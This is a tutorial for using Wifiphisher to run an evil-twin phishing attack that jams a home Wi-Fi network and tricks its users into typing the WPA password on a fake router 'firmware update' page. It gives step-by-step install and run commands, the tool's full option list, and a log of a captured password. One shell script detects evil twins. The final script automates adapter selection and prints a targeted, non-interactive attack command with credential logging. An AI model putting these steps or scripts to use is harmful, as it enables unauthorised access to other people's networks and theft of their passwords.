This article is intended for reference, not for destructive use. The security of home Wi-Fi routers has improved a lot, but users rarely update their router firmware, which leaves their networks open to configuration-change attacks and similar. There are many ways to attack a Wi-Fi network; one of the simplest is to use Wifiphisher. Note that Wifiphisher does not exploit the router at all: the "firmware update" is only the pretext it uses to talk the user into typing the Wi-Fi password.
An attacker running Wifiphisher first makes the target's router look faulty: the network is still visible, but every connection attempt fails. Because Wifiphisher sends deauthentication frames to every client, not just one device but all Wi-Fi devices lose their connection.
The targets then see a new Wi-Fi network with the same name as their own, created by the attacker, that does not require a password. After failing to rejoin their own protected network, they connect to the open one, assuming the router has a technical problem and has dropped its password. As soon as a device joins the attacker's network, it is shown a web page that imitates the router manufacturer's interface and announces that the router needs an important firmware update. Until the Wi-Fi password is entered to "apply" the update, the device gets no internet access.
After the password is entered, the page says the router is rebooting, and the targets believe their firmware has been updated. A few minutes later their devices reconnect to the real network. Nothing was actually updated; the page exists only to collect the WPA passphrase.
In practice this simple method consists of:
– Jamming the target's Wi-Fi network with deauthentication frames
– Creating a fake Wi-Fi network identical to the target's (Evil Twin)
– Serving a web page that tells the target to update the firmware and enter the Wi-Fi password to authenticate
– Collecting the password, while the target still believes the network is secure
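A defender-side check for the pattern just listed, added here as an example and not taken from Wifiphisher or from the original article: the evil twin shows up in a scan as a second BSS carrying the victim's SSID but without the Privacy capability bit. The script parses the output of iw dev <iface> scan with awk and flags any SSID that is advertised both protected and open. The scan dump, the SSIDs and the BSSIDs are constructed for this example (the open one borrows the rogue-AP MAC that appears in the Wifiphisher run later on this page); iw and root privileges are needed only for a live scan.

```shell
#!/bin/sh
# Evil-twin check: from an `iw dev <iface> scan` dump, list every SSID that is
# advertised by both a protected BSS and an open one. Example code, not part
# of Wifiphisher. The sample scan below is constructed.

# parse_scan: stdin = `iw dev <iface> scan` output.
# Prints one line per BSS: "<bssid> <open|protected> <ssid>".
# The "Privacy" capability bit is set for WEP/WPA/WPA2/WPA3; absent means open.
parse_scan() {
    awk '
        function emit() {
            if (bssid != "" && ssid != "")
                printf "%s %s %s\n", bssid, (priv ? "protected" : "open"), ssid
        }
        /^BSS [0-9a-f:]+/ { emit(); bssid = $2; sub(/\(.*/, "", bssid); priv = 0; ssid = "" }
        /^[[:space:]]*capability:/ { if ($0 ~ /Privacy/) priv = 1 }
        /^[[:space:]]*SSID:/ { sub(/^[[:space:]]*SSID: ?/, ""); ssid = $0 }
        END { emit() }
    '
}

# find_evil_twins: stdin = parse_scan output.
# Prints "SUSPECT <ssid> open-bssid: <mac>..." for each SSID seen both ways.
find_evil_twins() {
    awk '
        {
            ssid = $3
            for (i = 4; i <= NF; i++) ssid = ssid " " $i
            if ($2 == "open") open[ssid] = open[ssid] " " $1
            else prot[ssid] = 1
        }
        END {
            for (s in open) if (s in prot) printf "SUSPECT %s open-bssid:%s\n", s, open[s]
        }
    '
}

# Constructed sample: the real HomeNet (WPA, on 11:22:33:44:55:66), an
# unrelated 5 GHz network, and an open BSS copying the HomeNet name.
SAMPLE_SCAN='BSS 11:22:33:44:55:66(on wlan0)
	freq: 2437
	capability: ESS Privacy ShortSlotTime (0x0411)
	signal: -48.00 dBm
	SSID: HomeNet
	RSN:	 * Version: 1
BSS 11:22:33:44:55:67(on wlan0)
	freq: 5180
	capability: ESS Privacy (0x0011)
	signal: -60.00 dBm
	SSID: Office5G
BSS 00:00:00:31:8c:e5(on wlan0)
	freq: 2437
	capability: ESS ShortSlotTime (0x0401)
	signal: -30.00 dBm
	SSID: HomeNet'

# check_sample: run the check against the constructed scan.
check_sample() {
    printf '%s\n' "$SAMPLE_SCAN" | parse_scan | find_evil_twins
}

# Live use: sh evil_twin_check.sh wlan0   (scanning needs iw and root)
if [ -n "${1:-}" ] && command -v iw >/dev/null 2>&1; then
    iw dev "$1" scan | parse_scan | find_evil_twins
else
    check_sample
fi
```

The check only catches the open variant described above. Wifiphisher can also put WPA on the rogue access point (the -pK option in its help), so an unknown BSSID broadcasting your SSID is suspect even when it is protected; compare BSSIDs against your own router, not just the security flag.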
1. Here’s how
You need two Kali Linux compatible wireless adapters: one that supports AP mode for the rogue access point and one that supports monitor mode and packet injection for the deauthentication attack. A single adapter that supports both AP and monitor modes can do both jobs (that is what the -i option is for), but two adapters are more reliable.
Some types of adapters can be found on Amazon: Alfa AWUS036NH; Alfa AWUS051NH; TP-LINK TL-WN722N; Alfa AWUS036NEH; Panda PAU05; Alfa AWUS036H; Alfa AWUS036NHA.
You will also need a computer running Kali Linux with its package lists updated (apt update). If you skip that, you will most likely run into problems installing Wifiphisher.
Step 1: Install Wifiphisher
On the Kali Linux machine, open a terminal.
Type apt install wifiphisher to install Wifiphisher.
apt install wifiphisher
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages were automatically installed and are no longer required:
  guile-2.0-libs libbind9-160 libdns-export1102 libdns1100 libenca0 libexempi3 libgdbm5 libgeos-3.7.0 libhunspell-1.6-0 libirs160 libisc-export169 libisc169 libisccc160 libisccfg160 liblouis16 liblvm2app2.2 liblvm2cmd2.02 liblwres160 libnfs11 libnftnl7 libntfs-3g88 libomp5 libopencv-core3.2 libopencv-imgproc3.2 libperl5.26 libpoppler74 libpoppler80 libprotobuf-lite10 libprotobuf10 libqgis-analysis2.14.21 libqgis-core2.14.21 libqgis-core2.18.24 libqgis-gui2.14.21 libqgis-gui2.18.24 libqgis-networkanalysis2.14.21 libqgis-server2.14.21 libqgispython2.14.21 libradare2-2.9 libradare2-3.0 libsane-extras libsane-extras-common libtbb2 libuhd3.12.0 libunbound2 linux-image-4.16.0-kali2-amd64 php7.2-mysql python-anyjson python-capstone python-couchdbkit python-http-parser python-jwt python-libemu python-pam python-restkit python-socketpool x11proto-dri2-dev x11proto-gl-dev
Use 'apt autoremove' to remove them.
The following additional packages will be installed:
  python-pbkdf2 python-pyric python-roguehostapd
Suggested packages:
  python-pyric-doc
The following NEW packages will be installed:
  python-pbkdf2 python-pyric python-roguehostapd wifiphisher
0 upgraded, 4 newly installed, 0 to remove and 422 not upgraded.
Need to get 4,579 kB of archives.
After this operation, 10.8 MB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pbkdf2 all 1.3+20110613.git2a0fb15~ds0-3 [7,398 B]
Get:2 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-pyric all 0.1.6-0kali1 [308 kB]
Get:3 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 python-roguehostapd amd64 1.2.3-0kali2 [402 kB]
Get:4 http://mirrors.ocf.berkeley.edu/kali kali-rolling/main amd64 wifiphisher all 1.4+git20180525-0kali2 [3,862 kB]
Fetched 4,579 kB in 10s (458 kB/s)
Selecting previously unselected package python-pbkdf2.
(Reading database ... 431969 files and directories currently installed.)
Preparing to unpack .../python-pbkdf2_1.3+20110613.git2a0fb15~ds0-3_all.deb ...
Unpacking python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Selecting previously unselected package python-pyric.
Preparing to unpack .../python-pyric_0.1.6-0kali1_all.deb ...
Unpacking python-pyric (0.1.6-0kali1) ...
Selecting previously unselected package python-roguehostapd.
Preparing to unpack .../python-roguehostapd_1.2.3-0kali2_amd64.deb ...
Unpacking python-roguehostapd (1.2.3-0kali2) ...
Selecting previously unselected package wifiphisher.
Preparing to unpack .../wifiphisher_1.4+git20180525-0kali2_all.deb ...
Unpacking wifiphisher (1.4+git20180525-0kali2) ...
Setting up python-roguehostapd (1.2.3-0kali2) ...
Setting up python-pbkdf2 (1.3+20110613.git2a0fb15~ds0-3) ...
Setting up python-pyric (0.1.6-0kali1) ...
Setting up wifiphisher (1.4+git20180525-0kali2) ...
Progress: [ 95%] [#######################################################...]
You can also install from the GitHub repository, following the instructions on the GitHub page:
git clone https://github.com/wifiphisher/wifiphisher.git
cd wifiphisher
sudo python setup.py install
Step 2: Get to know Wifiphisher’s Flags
Type sudo wifiphisher --help to see Wifiphisher's options and what they do.
usage: wifiphisher [-h] [-i INTERFACE] [-eI EXTENSIONSINTERFACE] [-aI APINTERFACE] [-iI INTERNETINTERFACE] [-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE] [-iNM] [-kN] [-nE] [-nD] [-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID] [-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY] [-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT] [--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH] [--payload-path PAYLOAD_PATH] [-cM] [-wP] [-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH] [-pPD PHISHING_PAGES_DIRECTORY] [--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID]

optional arguments:
  -h, --help            show this help message and exit
  -i INTERFACE, --interface INTERFACE
                        Manually choose an interface that supports both AP and monitor modes for spawning the rogue AP as well as mounting additional Wi-Fi attacks from Extensions (i.e. deauth). Example: -i wlan1
  -eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE
                        Manually choose an interface that supports monitor mode for deauthenticating the victims. Example: -eI wlan1
  -aI APINTERFACE, --apinterface APINTERFACE
                        Manually choose an interface that supports AP mode for spawning the rogue AP. Example: -aI wlan0
  -iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE
                        Choose an interface that is connected on the Internet. Example: -iI ppp0
  -iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE
                        Specify the MAC address of the AP interface
  -iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_INTERFACE
                        Specify the MAC address of the extensions interface
  -iNM, --no-mac-randomization
                        Do not change any MAC address
  -kN, --keepnetworkmanager
                        Do not kill NetworkManager
  -nE, --noextensions   Do not load any extensions.
  -nD, --nodeauth       Skip the deauthentication phase.
  -dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]
                        Channels to deauth. Example: --deauth-channels 1,3,7
  -e ESSID, --essid ESSID
                        Enter the ESSID of the rogue Access Point. This option will skip Access Point selection phase. Example: --essid 'Free WiFi'
  -dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID
                        Deauth all the BSSIDs in the WLAN with that ESSID.
  -p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
                        Choose the phishing scenario to run. This option will skip the scenario selection phase. Example: -p firmware_upgrade
  -pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
                        Add WPA/WPA2 protection on the rogue Access Point. Example: -pK s3cr3tp4ssw0rd
  -hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE
                        Capture of the WPA/WPA2 handshakes for verifying passphrase. Example: -hC capture.pcap
  -qS, --quitonsuccess  Stop the script after successfully retrieving one pair of credentials
  -lC, --lure10-capture
                        Capture the BSSIDs of the APs that are discovered during AP selection phase. This option is part of Lure10 attack.
  -lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT
                        Fool the Windows Location Service of nearby Windows users to believe it is within an area that was previously captured with --lure10-capture. Part of the Lure10 attack.
  --logging             Log activity to file
  -dK, --disable-karma  Disables KARMA attack
  -lP LOGPATH, --logpath LOGPATH
                        Determine the full path of the logfile.
  -cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH
                        Determine the full path of the file that will store any captured credentials
  --payload-path PAYLOAD_PATH
                        Payload path for scenarios serving a payload
  -cM, --channel-monitor
                        Monitor if target access point changes the channel.
  -wP, --wps-pbc        Monitor if the button on a WPS-PBC Registrar is pressed.
  -wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
                        The WLAN interface used for associating to the WPS AccessPoint.
  -kB, --known-beacons  Broadcast a number of beacon frames advertising popular WLANs
  -fH, --force-hostapd  Force the usage of hostapd installed in the system
  -pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DIRECTORY
                        Search for phishing pages in this location
  --dnsmasq-conf DNSMASQ_CONF
                        Determine the full path of a custom dnsmasq.conf file
  -pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID
                        Determine the ESSID you want to use for the phishing page
Step 3: Plug in the Wireless Network Adapter
Plug the wireless network adapter(s) into the computer before starting Wifiphisher, so that the interfaces are present when it starts the phishing process.
Step 4: Run the script
Run Wifiphisher from the terminal.
If you are using a USB wireless adapter, point Wifiphisher at it with -i (here wlan1).
To run the script, type the following command:
sudo wifiphisher -i wlan1
After running the script you will see a screen listing all nearby Wi-Fi networks. Select the network you want to attack and press Enter.
Next choose the phishing scenario; option number 2 is the Firmware Upgrade Page used here.
The attack starts immediately. Wifiphisher also watches for devices probing for other networks they already know and answers those probes with fake access points (the KARMA attack, which can be turned off with -dK) to lure them in as well.
Once a target has been lured onto the rogue network, the phishing page asks for the Wi-Fi password.
When the target enters the password, the captured credential appears on the Wifiphisher screen:
[*] Starting Wifiphisher 1.4GIT ( https://wifiphisher.org ) at 2019-02-04 08:10
[+] Timezone detected. Setting channel range to 1-13
[+] Selecting wfphshr-wlan0 interface for the deauthentication attack
[+] Selecting wlan1 interface for creating the rogue Access Point
[+] Changing wlan1 MAC addr (BSSID) to 00:00:00:31:8c:e5
[!] The MAC address could not be set. (Tried 00:00:00:ee:5c:95)
[+] Sending SIGKILL to wpa_supplicant
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to NetworkManager
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...
[*] Starting HTTP/HTTPS server at ports 8080, 443
[+] Show your support!
[+] Follow us: https://twitter.com/wifiphisher
[+] Like us: https://www.facebook.com/Wifiphisher
[+] Captured credentials: wfphshr-wpa-password=myfatpassword
[!] Closing
The script then closes, and the "Captured credentials" line holds the password of the target Wi-Fi network (with --logging and -cP it is also written to the credential log file). Keep in mind that Wifiphisher does not check what the target typed unless you give it a captured WPA handshake with -hC; without that, a mistyped password is logged as-is.
And this is what the target sees on their own screen.
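The whole procedure as one unattended run, added here as an example and not Wifiphisher's own code: the part that most often fails in practice is adapter capability, so the script first parses iw list and iw dev to find a phy with AP mode for the rogue access point and a different phy with monitor mode for deauthentication, and then prints a wifiphisher command built only from the flags in Step 2 (-aI, -eI, -e, -dE, -p, -qS, --logging, -lP, -cP), so the access point and scenario menus described in Step 4 are skipped and -dE keeps the deauthentication aimed at the real network by name. The iw output, the interface names, the HomeNet ESSID and the /tmp/wp log directory are constructed assumptions; run it with --live on the attacking machine to use real iw output.

```shell
#!/bin/sh
# Pre-flight for the two-adapter setup: pick an AP-capable interface for the
# rogue AP and a different monitor-capable one for deauthentication, then print
# a non-interactive wifiphisher command. Example code, not part of Wifiphisher.
# IW_LIST / IW_DEV below are constructed samples; --live replaces them.

# phy_modes: stdin = `iw list` output. Prints "<phy> <mode>..." per phy,
# taking both the hardware list and the "software interface modes" list.
phy_modes() {
    awk '
        /^Wiphy / { if (phy != "") print phy modes; phy = $2; modes = ""; inlist = 0; next }
        /interface modes/ { inlist = 1; next }
        inlist && /^[[:space:]]*\* / { modes = modes " " $2; next }
        { inlist = 0 }
        END { if (phy != "") print phy modes }
    '
}

# phy_to_iface: stdin = `iw dev` output. Prints "<phy> <iface>" pairs
# ("phy#0" in iw dev is "phy0" in iw list).
phy_to_iface() {
    awk '
        /^phy#/ { phy = "phy" substr($1, 5); next }
        /^[[:space:]]*Interface / { print phy, $2 }
    '
}

# pick_iface MODE MODES MAP [EXCLUDE]: MODES is phy_modes output, MAP is
# phy_to_iface output. Prints the first interface whose phy lists MODE and
# is not EXCLUDE; prints nothing if none qualifies.
pick_iface() {
    printf '%s\n' "$2" | MAP="$3" awk -v m="$1" -v ex="${4:-}" '
        BEGIN {
            n = split(ENVIRON["MAP"], lines, "\n")
            for (i = 1; i <= n; i++) { split(lines[i], kv, " "); iface[kv[1]] = kv[2] }
        }
        {
            if (!($1 in iface) || iface[$1] == ex) next
            for (i = 2; i <= NF; i++) if ($i == m) { print iface[$1]; exit }
        }
    '
}

# build_cmd AP_IF EXT_IF ESSID OUTDIR: skip the AP menu (-e) and the scenario
# menu (-p), deauth the real network by name (-dE), quit after the first
# credential (-qS) and log to OUTDIR (--logging, -lP, -cP).
build_cmd() {
    printf "sudo wifiphisher -aI %s -eI %s -e '%s' -dE '%s' -p firmware_upgrade -qS --logging -lP %s/wifiphisher.log -cP %s/creds.txt\n" \
        "$1" "$2" "$3" "$3" "$4" "$4"
}

# Constructed samples: phy0 (wlan0) supports AP and monitor, phy1 (wlan1) only
# managed and monitor, so wlan0 must host the AP and wlan1 must deauth.
IW_LIST='Wiphy phy0
	wiphy index: 0
	Supported interface modes:
		 * IBSS
		 * managed
		 * AP
		 * AP/VLAN
		 * monitor
	Band 1:
		Frequencies:
	software interface modes (can always be added):
		 * AP/VLAN
		 * monitor
Wiphy phy1
	wiphy index: 1
	Supported interface modes:
		 * managed
		 * monitor
	Band 1:'

IW_DEV='phy#0
	Interface wlan0
		ifindex 3
		type managed
phy#1
	Interface wlan1
		ifindex 4
		type managed'

TARGET_ESSID=HomeNet   # assumed target network name

# plan: choose the interfaces from IW_LIST/IW_DEV and print the command,
# or fail with a message if the adapters cannot cover both roles.
plan() {
    modes=$(printf '%s\n' "$IW_LIST" | phy_modes)
    map=$(printf '%s\n' "$IW_DEV" | phy_to_iface)
    ap=$(pick_iface AP "$modes" "$map")
    ext=$(pick_iface monitor "$modes" "$map" "$ap")
    if [ -z "$ap" ] || [ -z "$ext" ]; then
        echo "need one AP-capable and one other monitor-capable interface" >&2
        return 1
    fi
    build_cmd "$ap" "$ext" "$TARGET_ESSID" /tmp/wp
}

if [ "${1:-}" = "--live" ] && command -v iw >/dev/null 2>&1; then
    IW_LIST=$(iw list)
    IW_DEV=$(iw dev)
fi
plan
```

The script only prints the command; copy it into the terminal once the interface choice looks right. If plan reports that no second monitor-capable interface exists, fall back to a single adapter that lists both AP and monitor modes and use -i instead of -aI/-eI, as the help text describes.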